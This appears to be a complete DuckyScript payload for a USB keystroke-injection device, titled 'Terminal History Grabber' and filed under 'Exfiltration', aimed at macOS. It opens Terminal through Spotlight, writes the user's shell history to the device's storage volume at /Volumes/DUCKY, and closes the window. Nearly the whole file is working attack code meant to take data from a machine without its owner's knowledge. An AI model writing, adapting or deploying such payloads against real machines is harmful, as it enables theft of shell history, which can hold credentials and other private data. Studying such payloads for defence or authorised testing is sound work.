REM Title:         Terminal History Grabber
REM Description:   Extracts the terminal history of the device onto the ducky
REM Author:        matthewkayne
REM Category:      Exfiltration
REM Target:        macOS (Terminal)
REM Requires:      Twin Duck firmware or separate USB stick (requires change to the path of the file)
DELAY 1000
GUI SPACE
DELAY 400
STRING terminal
ENTER
DELAY 200
STRING history > /Volumes/DUCKY/history.txt
DELAY 100
ENTER
DELAY 200
ENTER
DELAY 200
GUI w
DELAY 200
ENTER
